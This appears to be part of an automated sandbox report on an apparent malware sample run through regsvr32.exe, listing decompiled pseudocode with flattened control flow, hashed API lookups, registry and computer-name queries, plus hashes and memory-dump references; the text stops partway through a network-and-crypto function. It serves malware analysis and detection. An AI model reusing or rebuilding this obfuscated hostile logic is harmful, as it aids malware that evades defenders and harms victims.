                                                                                                                                                        0x00453ae9
                                                                                                                                                        0x00453aec
                                                                                                                                                        0x00453aee
                                                                                                                                                        0x00453af3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00453af3
                                                                                                                                                        0x00453ab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00453b00
                                                                                                                                                        0x00453b00
                                                                                                                                                        0x00453a8b
                                                                                                                                                        0x00453ac7
                                                                                                                                                        0x00453a8d
                                                                                                                                                        0x00453a93
                                                                                                                                                        0x00453a95
                                                                                                                                                        0x00453a9a
                                                                                                                                                        0x00453a9d
                                                                                                                                                        0x00453aa2
                                                                                                                                                        0x00453aa2
                                                                                                                                                        0x00453a93
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,004609DE), ref: 00453A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                        • String ID: ~%z
                                                                                                                                                        • API String ID: 1964310414-678350322
                                                                                                                                                        • Opcode ID: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction ID: 1bbd3a4603b4fb92b818fdb53bb8e81d4c2760d8b0758ebee956f2fd6c210754
                                                                                                                                                        • Opcode Fuzzy Hash: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction Fuzzy Hash: F5113D2231858052D73C0E1568A1B3E268387987CAF18013FED4F97F97C85DCE86470B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00457B43, Relevance: 1.7, APIs: 1, Instructions: 213registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                        			E00457B43(intOrPtr __edx, long long __rax, void* __rcx) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				long long _v136;
				intOrPtr _v140;
				long long _v152;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v181;
				long long _v192;
				long long _v200;
				void* _t69;
				intOrPtr _t108;
				long long _t115;
				signed long long _t123;
				intOrPtr* _t131;
				void* _t140;
				void* _t144;
				void* _t146;
				signed long long _t147;
				long long _t148;

				_t115 = __rax;
				_t144 =  &_v168;
				_t108 = __edx;
				_t140 = __rcx;
				E0045CDB9(0xc8, __rax);
				_v152 = _t115;
				_t131 =  &_v180;
				_v136 = _t131;
				 *_t131 = 0;
				_v128 =  &_v160;
				_v88 = _t140 + 0xb44;
				_v96 = _t140 + 0x294;
				_v104 = _t140 + 0x280;
				_v140 = _t108;
				r12d = 0xf11b687f;
				r12d =  ==  ? 0xf83e1c76 : r12d;
				r15d = 0x5c7553b0;
				r15d =  ==  ? 0xdab00bc5 : r15d;
				_t15 = _t140 + 0x5d2; // 0x5c755982
				_v112 = _t15;
				_t17 = _t140 + 0x650; // 0x5c755a00
				_t123 = _t17;
				_v120 = _t123;
				_t69 = 0xbda386ba;
				L1:
				while(1) {
					while(_t69 > 0xdab00bc4) {
						if(_t69 <= 0xf83e1c75) {
							if(_t69 == 0xdab00bc5) {
								 *((short*)(_t140 + 0x294)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x664));
								_t69 = 0x5c7553b0;
								_t147 = _v104;
								_t148 = _v96;
								continue;
							}
							if(_t69 == 0xe6671123) {
								_t69 =  !=  ? 0x9491a652 : 0x1c0ab71e;
								continue;
							}
							if(_t69 != 0xf11b687f) {
								continue;
							}
							L29:
							_t69 = 0xd22e7491;
							continue;
						}
						if(_t69 > 0x38db78b6) {
							if(_t69 == 0x38db78b7) {
								r13d = 0;
								r14d = 0;
								_t69 = r15d;
								continue;
							}
							if(_t69 != 0x5c7553b0) {
								continue;
							}
							_v80 = _t147;
							_v72 = _t148;
							_v176 = 0;
							_v172 = 0x4cf804b1;
							_v168 = 0x5dec0a95;
							_v164 = 0x38ed4ebe;
							if(_v176 != 0) {
								L25:
								E0046020E(_t123, _v152,  &_v172, _v88, _t146);
								r8d = 0x6e0c8ed2;
								r9d = 0xd6;
								E0045FAD7(2, _t108, _t123, _v152);
								_t41 =  &_v160; // 0xf11b68c7
								_v200 = _t41;
								r8d = 0;
								r9d = 0x20019; // executed
								RegOpenKeyExA(??, ??, ??, ??, ??); // executed
								_t131 = _v152;
								E0045CC2E(_t123, _t131);
								_t69 =  ==  ? 0xc40b2334 : 0xbedb4fc6;
								continue;
							}
							do {
								 *(_t144 + 0x38 + _t123 * 4) = ( *(_t144 + 0x38 + _t123 * 4) & 0xfeab8f08 |  !( *(_t144 + 0x38 + _t123 * 4)) & 0x015470f7) ^ 0x39ca1b15;
								_t131 = _t131 + 1;
								_t123 = _t123 + 1;
							} while (_t123 != 4);
							goto L25;
						} else {
							if(_t69 == 0xf83e1c76) {
								 *((intOrPtr*)(_t140 + 0x664)) = _v180;
								_t69 = 0xf11b687f;
							} else {
								if(_t69 == 0x1c0ab71e) {
									_t69 = r12d;
								}
							}
							continue;
						}
					}
					if(_t69 <= 0xbda386b9) {
						if(_t69 == 0x8f6e5d8a) {
							goto L29;
						}
						if(_t69 == 0x9491a652) {
							 *((intOrPtr*)(_t140 + 0x638)) = _v180;
							_t69 = 0xf11b687f;
						} else {
							if(_t69 == 0xa8bc8896) {
								 *((short*)(_t140 + 0x5d2)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x638));
								_t69 = 0x5c7553b0;
								_t147 = _v120;
								_t148 = _v112;
							}
						}
						continue;
					}
					if(_t69 > 0xc40b2333) {
						if(_t69 == 0xc40b2334) {
							r8d = 0xbdd87e1e;
							r9d = 0xde;
							E0045FAD7(2, _t108, _t123, _t131);
							_t60 =  &_v180; // 0xf11b68b3
							_v192 = _t60;
							_v200 = _v72;
							r8d = 0;
							r9d = 0;
							 *_t123();
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E0045FAD7(2, _t108, _t123, _v160);
							_t131 = _v160;
							 *_t123();
							_t69 =  ==  ? 0xe6671123 : 0x8f6e5d8a;
							continue;
						}
						if(_t69 != 0xd22e7491) {
							continue;
						}
						return _t69;
					}
					if(_t69 == 0xbda386ba) {
						_v181 = _v140 == 1;
						_t69 =  !=  ? 0xa8bc8896 : 0x38db78b7;
						continue;
					}
					if(_t69 != 0xbedb4fc6) {
						continue;
					}
					goto L29;
				}
			}

































                                                                                                                                                        0x00457b43
                                                                                                                                                        0x00457b4f
                                                                                                                                                        0x00457b56
                                                                                                                                                        0x00457b58
                                                                                                                                                        0x00457b60
                                                                                                                                                        0x00457b65
                                                                                                                                                        0x00457b6a
                                                                                                                                                        0x00457b6f
                                                                                                                                                        0x00457b79
                                                                                                                                                        0x00457b84
                                                                                                                                                        0x00457b95
                                                                                                                                                        0x00457ba4
                                                                                                                                                        0x00457bb3
                                                                                                                                                        0x00457bbb
                                                                                                                                                        0x00457bc7
                                                                                                                                                        0x00457bcd
                                                                                                                                                        0x00457bd6
                                                                                                                                                        0x00457bdc
                                                                                                                                                        0x00457be0
                                                                                                                                                        0x00457be7
                                                                                                                                                        0x00457bec
                                                                                                                                                        0x00457bec
                                                                                                                                                        0x00457bf3
                                                                                                                                                        0x00457bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457bfd
                                                                                                                                                        0x00457bfd
                                                                                                                                                        0x00457c09
                                                                                                                                                        0x00457c5b
                                                                                                                                                        0x00457e0b
                                                                                                                                                        0x00457e1a
                                                                                                                                                        0x00457e1e
                                                                                                                                                        0x00457e23
                                                                                                                                                        0x00457e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457e2b
                                                                                                                                                        0x00457c66
                                                                                                                                                        0x00457e47
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457e47
                                                                                                                                                        0x00457c71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457dcc
                                                                                                                                                        0x00457dcc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457dcc
                                                                                                                                                        0x00457c10
                                                                                                                                                        0x00457cc5
                                                                                                                                                        0x00457e63
                                                                                                                                                        0x00457e66
                                                                                                                                                        0x00457e69
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457e69
                                                                                                                                                        0x00457cd0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457cd6
                                                                                                                                                        0x00457cde
                                                                                                                                                        0x00457ce8
                                                                                                                                                        0x00457cec
                                                                                                                                                        0x00457cf4
                                                                                                                                                        0x00457cfc
                                                                                                                                                        0x00457d08
                                                                                                                                                        0x00457d3d
                                                                                                                                                        0x00457d4f
                                                                                                                                                        0x00457d60
                                                                                                                                                        0x00457d66
                                                                                                                                                        0x00457d6c
                                                                                                                                                        0x00457d71
                                                                                                                                                        0x00457d76
                                                                                                                                                        0x00457d85
                                                                                                                                                        0x00457d88
                                                                                                                                                        0x00457d8e
                                                                                                                                                        0x00457d93
                                                                                                                                                        0x00457d98
                                                                                                                                                        0x00457da9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457da9
                                                                                                                                                        0x00457d11
                                                                                                                                                        0x00457d2d
                                                                                                                                                        0x00457d31
                                                                                                                                                        0x00457d34
                                                                                                                                                        0x00457d37
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457c16
                                                                                                                                                        0x00457c1b
                                                                                                                                                        0x00457dda
                                                                                                                                                        0x00457de0
                                                                                                                                                        0x00457c21
                                                                                                                                                        0x00457c26
                                                                                                                                                        0x00457c28
                                                                                                                                                        0x00457c28
                                                                                                                                                        0x00457c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457c1b
                                                                                                                                                        0x00457c10
                                                                                                                                                        0x00457c32
                                                                                                                                                        0x00457c7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457c88
                                                                                                                                                        0x00457e53
                                                                                                                                                        0x00457e59
                                                                                                                                                        0x00457c8e
                                                                                                                                                        0x00457c93
                                                                                                                                                        0x00457c99
                                                                                                                                                        0x00457ca8
                                                                                                                                                        0x00457cac
                                                                                                                                                        0x00457cb1
                                                                                                                                                        0x00457cb6
                                                                                                                                                        0x00457cb6
                                                                                                                                                        0x00457c93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457c88
                                                                                                                                                        0x00457c39
                                                                                                                                                        0x00457db6
                                                                                                                                                        0x00457e8d
                                                                                                                                                        0x00457e93
                                                                                                                                                        0x00457e99
                                                                                                                                                        0x00457e9e
                                                                                                                                                        0x00457ea3
                                                                                                                                                        0x00457ea8
                                                                                                                                                        0x00457eb3
                                                                                                                                                        0x00457eb6
                                                                                                                                                        0x00457eb9
                                                                                                                                                        0x00457eca
                                                                                                                                                        0x00457ed0
                                                                                                                                                        0x00457ed6
                                                                                                                                                        0x00457edb
                                                                                                                                                        0x00457ede
                                                                                                                                                        0x00457eec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457eec
                                                                                                                                                        0x00457dc1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457f11
                                                                                                                                                        0x00457f11
                                                                                                                                                        0x00457c44
                                                                                                                                                        0x00457def
                                                                                                                                                        0x00457e03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457e03
                                                                                                                                                        0x00457c4f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00457c51

                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,D179479F,A4EA36C8,00000000,?), ref: 00457D8E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction ID: 952ef07629b2ccfdd991eaa4c95d24a880a6e1b5334c8b5230e549b42f8429e7
                                                                                                                                                        • Opcode Fuzzy Hash: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction Fuzzy Hash: BC81F47231D78486DA64CA19F49035BB6A0F388B59F144027EF9DC7B1ADB3CD8598B06
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0045D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                        			E0045D1C4(intOrPtr __rcx, intOrPtr __rdx) {
				char _v68;
				char _v72;
				void* _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				char _v129;
				void* _t47;
				void* _t81;
				signed long long _t88;
				long long* _t90;
				intOrPtr* _t94;
				signed long long _t96;
				intOrPtr _t106;
				signed long long* _t108;
				intOrPtr _t110;
				long long _t111;
				long long _t112;
				long long _t113;

				_t108 =  &_v104;
				_t110 = __rdx;
				_t106 = __rcx;
				_t94 =  &_v68;
				_v96 = _t94;
				_t88 = _v96;
				 *_t94 = 0x14;
				r13d = 0;
				r8d = 0x913338ad;
				r9d = 0x74;
				E0045FAD7(1, _t81, _t88, __rcx);
				_t98 = __rcx;
				GetComputerNameA(??, ??); // executed
				_v129 =  *((intOrPtr*)(__rcx));
				_t96 =  &_v128 | _t88;
				_t47 = 0x72f0bc31;
				_t112 =  &_v72;
				_t113 =  &_v112;
				L1:
				while(_t47 > 0x31a4f3ac) {
					if(_t47 > 0x368c7021) {
						if(_t47 == 0x368c7022) {
							_v88 = _t112;
							_v80 = _t113;
							_t90 = _v80;
							_v112 = _t111;
							r8d = 0x8ece2d00;
							r9d = 0x209;
							E0045FAD7(0xa, _t81, _t90, _t98);
							 *_t90(); // executed
							_t88 = _v112;
							_v104 = _t88;
							_t47 =  ==  ? 0x31a4f3ad : 0x2d657e6;
						} else {
							if(_t47 == 0x72f0bc31) {
								_t47 =  ==  ? 0x900af59d : 0x368c7022;
							}
						}
						continue;
					}
					if(_t47 == 0x31a4f3ad) {
						_v128 = r13b;
						_v124 = 0x21a85fec;
						_v120 = 0x73bf45ed;
						if(_v128 != r13b) {
							L16:
							_t98 = _t110;
							r8d = 8;
							E0045C96E(_t47, _t110, _t96);
							_t47 = 0x134a0c57;
							continue;
						}
						do {
							 *(_t108 + 0x2c + _t88 * 4) =  *(_t108 + 0x2c + _t88 * 4) & 0x8c10ef5d |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x73ef10a2;
							_t47 = 1;
						} while (_t88 == 0);
						goto L16;
					} else {
						if(_t47 == 0x31fa4db0) {
							E0045C3D4(_v104, _t110);
							r8d = 0xd4d62162;
							r9d = 0x208;
							E0045FAD7(0xa, _t81, _t88, _v104);
							_t98 = _v112;
							 *_t88();
							_t47 = 0x134a0c57;
						}
						continue;
					}
				}
				if(_t47 == 0x900af59d) {
					_v128 = r13b;
					_v124 = 0x73bca5c0;
					_v120 = 0x32f8abda;
					if(_v128 != r13b) {
						L20:
						_t98 = _t106;
						r8d = 7;
						E0045C96E(_t47, _t106, _t96);
						_t47 = 0x368c7022;
						goto L1;
					}
					do {
						 *(_t108 + 0x2c + _t88 * 4) = ( *(_t108 + 0x2c + _t88 * 4) & 0x9ec2c1cc |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x613d3e33) ^ 0x53c5d4bd;
						_t47 = 1;
					} while (_t88 == 0);
					goto L20;
				}
				if(_t47 == 0x2d657e6) {
					_t88 = _v104;
					_t47 =  ==  ? 0x31a4f3ad : 0x31fa4db0;
					goto L1;
				}
				if(_t47 != 0x134a0c57) {
					goto L1;
				}
				return _t47;
			}


























                                                                                                                                                        0x0045d1d0
                                                                                                                                                        0x0045d1d4
                                                                                                                                                        0x0045d1d7
                                                                                                                                                        0x0045d1da
                                                                                                                                                        0x0045d1df
                                                                                                                                                        0x0045d1e4
                                                                                                                                                        0x0045d1e9
                                                                                                                                                        0x0045d1ef
                                                                                                                                                        0x0045d1f9
                                                                                                                                                        0x0045d1ff
                                                                                                                                                        0x0045d205
                                                                                                                                                        0x0045d20a
                                                                                                                                                        0x0045d210
                                                                                                                                                        0x0045d214
                                                                                                                                                        0x0045d222
                                                                                                                                                        0x0045d225
                                                                                                                                                        0x0045d22f
                                                                                                                                                        0x0045d234
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d239
                                                                                                                                                        0x0045d245
                                                                                                                                                        0x0045d2b6
                                                                                                                                                        0x0045d3b4
                                                                                                                                                        0x0045d3be
                                                                                                                                                        0x0045d3c3
                                                                                                                                                        0x0045d3c8
                                                                                                                                                        0x0045d3d4
                                                                                                                                                        0x0045d3da
                                                                                                                                                        0x0045d3e0
                                                                                                                                                        0x0045d3ed
                                                                                                                                                        0x0045d3ef
                                                                                                                                                        0x0045d3f4
                                                                                                                                                        0x0045d403
                                                                                                                                                        0x0045d2bc
                                                                                                                                                        0x0045d2c1
                                                                                                                                                        0x0045d2d6
                                                                                                                                                        0x0045d2d6
                                                                                                                                                        0x0045d2c1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d2b6
                                                                                                                                                        0x0045d24c
                                                                                                                                                        0x0045d2de
                                                                                                                                                        0x0045d2e3
                                                                                                                                                        0x0045d2eb
                                                                                                                                                        0x0045d2f8
                                                                                                                                                        0x0045d320
                                                                                                                                                        0x0045d320
                                                                                                                                                        0x0045d326
                                                                                                                                                        0x0045d32c
                                                                                                                                                        0x0045d331
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d331
                                                                                                                                                        0x0045d2fc
                                                                                                                                                        0x0045d312
                                                                                                                                                        0x0045d319
                                                                                                                                                        0x0045d319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d252
                                                                                                                                                        0x0045d257
                                                                                                                                                        0x0045d261
                                                                                                                                                        0x0045d272
                                                                                                                                                        0x0045d278
                                                                                                                                                        0x0045d27e
                                                                                                                                                        0x0045d283
                                                                                                                                                        0x0045d286
                                                                                                                                                        0x0045d288
                                                                                                                                                        0x0045d288
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d257
                                                                                                                                                        0x0045d24c
                                                                                                                                                        0x0045d294
                                                                                                                                                        0x0045d33b
                                                                                                                                                        0x0045d340
                                                                                                                                                        0x0045d348
                                                                                                                                                        0x0045d355
                                                                                                                                                        0x0045d383
                                                                                                                                                        0x0045d383
                                                                                                                                                        0x0045d389
                                                                                                                                                        0x0045d38f
                                                                                                                                                        0x0045d394
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d394
                                                                                                                                                        0x0045d359
                                                                                                                                                        0x0045d375
                                                                                                                                                        0x0045d37c
                                                                                                                                                        0x0045d37c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d359
                                                                                                                                                        0x0045d29f
                                                                                                                                                        0x0045d39e
                                                                                                                                                        0x0045d3ac
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d3ac
                                                                                                                                                        0x0045d2aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045d42a

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                        • Opcode ID: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction ID: 0b9d49abfca328e04563e3621519466e4cc81ef192db3192655b982bd0fcd61f
                                                                                                                                                        • Opcode Fuzzy Hash: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction Fuzzy Hash: 1D512C2270864486CA348B5AF45421FAB50F789785F58411BFF8EC7B59CA7DC88ACB0A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0045C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                        			E0045C450(signed long long __rax, long long __rcx) {
				char _v52;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				int _t23;
				void* _t39;
				signed long long _t44;
				char* _t46;
				intOrPtr* _t47;
				long long _t48;
				void* _t49;

				_t44 = __rax;
				_t48 = __rcx;
				r8d = 0xe249a58d;
				r9d = 0xac;
				E0045FAD7(1, _t39, __rax, __rcx);
				_t46 =  &_v72;
				 *_t44();
				_t47 =  &_v52;
				 *((char*)(_t47 - 4)) = 0;
				 *_t47 = 0x32816739;
				 *((intOrPtr*)(_t47 + 4)) = 0x32816739;
				 *((intOrPtr*)(_t47 + 8)) = 0x32b5676d;
				 *((intOrPtr*)(_t47 + 0xc)) = 0x32d5670d;
				 *((intOrPtr*)(_t47 + 0x10)) = 0x329c6724;
				 *((intOrPtr*)(_t47 + 0x14)) = 0x32f86740;
				if( *((intOrPtr*)(_t47 - 4)) == 0) {
					do {
						 *(_t49 + 0x40 + _t44 * 4) =  *(_t49 + 0x40 + _t44 * 4) & 0xcd0798bf |  !( *(_t49 + 0x40 + _t44 * 4)) & 0x32f86740;
						_t46 = _t46 + 1;
						_t44 = _t44 + 1;
					} while (_t44 != 7);
				}
				r8d = 0xc87545f4;
				r9d = 0xcc;
				E0045FAD7(1, _t39, _t44, _t46);
				_v88 = _t48;
				_v80 = 0xc;
				_t23 = GetDateFormatW(??, ??, ??, ??, ??, ??); // executed
				return _t23;
			}














                                                                                                                                                        0x0045c450
                                                                                                                                                        0x0045c457
                                                                                                                                                        0x0045c463
                                                                                                                                                        0x0045c469
                                                                                                                                                        0x0045c46f
                                                                                                                                                        0x0045c474
                                                                                                                                                        0x0045c479
                                                                                                                                                        0x0045c47b
                                                                                                                                                        0x0045c480
                                                                                                                                                        0x0045c488
                                                                                                                                                        0x0045c48a
                                                                                                                                                        0x0045c48d
                                                                                                                                                        0x0045c494
                                                                                                                                                        0x0045c49b
                                                                                                                                                        0x0045c4a2
                                                                                                                                                        0x0045c4ac
                                                                                                                                                        0x0045c4b5
                                                                                                                                                        0x0045c4cb
                                                                                                                                                        0x0045c4cf
                                                                                                                                                        0x0045c4d2
                                                                                                                                                        0x0045c4d5
                                                                                                                                                        0x0045c4b5
                                                                                                                                                        0x0045c4e2
                                                                                                                                                        0x0045c4e8
                                                                                                                                                        0x0045c4ee
                                                                                                                                                        0x0045c4f3
                                                                                                                                                        0x0045c4f8
                                                                                                                                                        0x0045c50f
                                                                                                                                                        0x0045c519

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2793631785-0
                                                                                                                                                        • Opcode ID: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction ID: 962fa19b57dc681b7eb4f7ab19086e21e003cdd99a990caa9b166c6c248c1cb5
                                                                                                                                                        • Opcode Fuzzy Hash: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction Fuzzy Hash: CF1136B33143849BE719DF16F340A5EAA51F3A5344F04C13ADB4987B45CB78D566CB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 6872 Parent PID: 3440 regsvr32.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00A16537, Relevance: 22.1, APIs: 2, Strings: 10, Instructions: 1095networkCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                        			E00A16537(void* __edx, unsigned long long __rcx, signed long long __rdx, long long __r9, void* __r11) {
				intOrPtr _v464;
				char _v468;
				char _v472;
				signed long long _v480;
				long long _v488;
				void* _v496;
				void* _v504;
				unsigned int* _v512;
				signed long long _v520;
				signed long long _v528;
				void* _v536;
				void* _v544;
				long long _v552;
				void* _v560;
				void* _v568;
				void* _v576;
				long long _v584;
				void* _v592;
				void* _v600;
				void* _v608;
				intOrPtr _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v632;
				long long _v640;
				void* _v648;
				void* _v656;
				void* _v664;
				signed long long _v672;
				void* _v680;
				void* _v688;
				void* _v696;
				void* _v704;
				void* _v712;
				unsigned long long _v720;
				signed long long _v728;
				signed long long _v736;
				void* _v744;
				void* _v752;
				void* _v760;
				signed int _v764;
				long long _v768;
				intOrPtr _v772;
				unsigned int _v776;
				intOrPtr _v780;
				char _v784;
				char _v788;
				signed int _v792;
				signed int _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char _v808;
				signed long long _v816;
				intOrPtr _v817;
				char _v821;
				signed int _v832;
				unsigned int* _v840;
				signed int _v844;
				signed int _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				signed long long _v860;
				intOrPtr _v864;
				unsigned int _v868;
				unsigned long long _v872;
				char _v873;
				char _v875;
				void* _v888;
				signed short _v890;
				short _v892;
				void* _v904;
				unsigned int _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				intOrPtr _v928;
				signed long long _v936;
				signed int _t368;
				signed int _t417;
				signed long long _t450;
				void* _t473;
				void* _t497;
				signed int _t503;
				signed int _t532;
				signed int _t572;
				unsigned int _t596;
				signed int _t600;
				unsigned long long _t632;
				signed long long _t640;
				short* _t644;
				signed long long _t706;
				unsigned long long _t707;
				signed long long _t721;
				void* _t723;
				void* _t726;

				_t726 = __r11;
				_t725 = __r9;
				_t721 = __rdx;
				_t707 = __rcx;
				_t723 =  &_v904;
				_v568 = __r9;
				_v906 = r8b;
				_v696 = __rcx + 0xc;
				_v576 = __rcx + 0x218;
				_v584 = __rcx + 0x10;
				_t600 =  !=  ? 0xf8d80d50 : 0xf3bb400e;
				r15d = 0x5d3f2d89;
				_t363 =  !=  ? r15d : 0xf8c794ac;
				_v612 =  !=  ? r15d : 0xf8c794ac;
				r15d =  ==  ? 0xa6dbf53a : r15d;
				_t603 =  <  ? 0x902c474f : 0x4721b862;
				_v616 =  <  ? 0x902c474f : 0x4721b862;
				_t605 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v620 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v592 = __rcx + 0x240;
				_t589 =  ==  ? 0x4591200e : 0x727b8f2a;
				_v624 =  ==  ? 0x4591200e : 0x727b8f2a;
				r13d = 0xe84fe95c;
				r13d =  <  ? 0x1cfee6ca : r13d;
				r14d = 0x87afab9e;
				r14d =  <=  ? 0x7ff9f897 : r14d;
				_v600 = __rcx + 0x238;
				_v704 = __rcx + 0x24c;
				_v608 = __rcx + 0x248;
				_v752 = __rcx + 0x254;
				_v760 = __rcx + 8;
				_v488 = __rcx + 0x259;
				_v904 = __rcx;
				_t632 = __rcx + 0x258;
				_v712 = _t632;
				_v868 = 0x7ff9f897;
				_v728 = _t632;
				_v720 = _t632;
				_t368 = 0xa26d3c93;
				while(1) {
					_t503 = _t368;
					if(_t368 <= 0x12c2784) {
					}
					L2:
					if(_t503 > 0xad7f3ccf) {
						if(_t503 > 0xd55faea1) {
							if(_t503 <= 0xeee9c934) {
								if(_t503 <= 0xe84fe95b) {
									if(_t503 == 0xd55faea2) {
										_t368 =  ==  ? 0x873106d2 : 0xa4415a4b;
									} else {
										_t368 = _t503;
